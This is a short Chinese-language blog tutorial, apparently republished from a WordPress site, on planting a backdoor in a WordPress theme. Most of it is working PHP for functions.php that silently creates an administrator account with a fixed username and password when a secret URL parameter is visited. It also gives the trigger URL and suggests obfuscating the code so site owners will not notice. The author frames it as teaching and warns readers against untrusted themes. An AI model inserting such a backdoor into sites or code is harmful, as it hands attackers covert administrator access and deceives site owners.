如何在 WordPress 站点创建后门

是不是在很多场合听说过后门（Backdoor），特别是一些高科技的电影里面，那些系统或者程序的作者都会通过自己留下的后门来拯救世界 。其实程序的后门留我们根本不远，其实你用的很多软件或者程序都是有后门的，下面给大家演示的一个很简单的案例，就可以给 WordPress 站点留下后门，获取管理员权限，当然这只是一篇教学文章，个人强烈你在使用 WordPress 帮人作网站的时候，千万不要这样做。

add_action( 'wp_head', 'my_backdoor' );

function my_backdoor() {
 if ( md5( $_GET['back'] ) == 'd1c5938b1b1931c28140f1914a1ee17b' ) {
 require( 'wp-includes/registration.php' );
 if ( !username_exists( 'backdoor' ) ) {
 $user_id = wp_create_user( 'backdoor', 'pa55w0rd' );
 $user = new WP_User( $user_id );
 $user->set_role( 'administrator' ); 
 }
 }
}

比如在主题的 functions.php 文件中添加以上代码，就可以给 WordPress 添加一个能够创建管理员的后门，只需访问 http://www.你的域名.com/?back=aiboshuo，然后就创建了一个用户名为“backdoor”，密码为：“pa55w0rd” 的管理员。

如果在把上面这段代码加密一下，很多用户就根本不知道这段代码是做什么的，所以强烈建议大家不要随便去下载一些来路不明的 WordPress 主题和插件，说不定就给你的站点安装了一个后门。

原文http://blog.wpjam.com/m/how-to-create-a-backdoor-to-a-wordpress-website/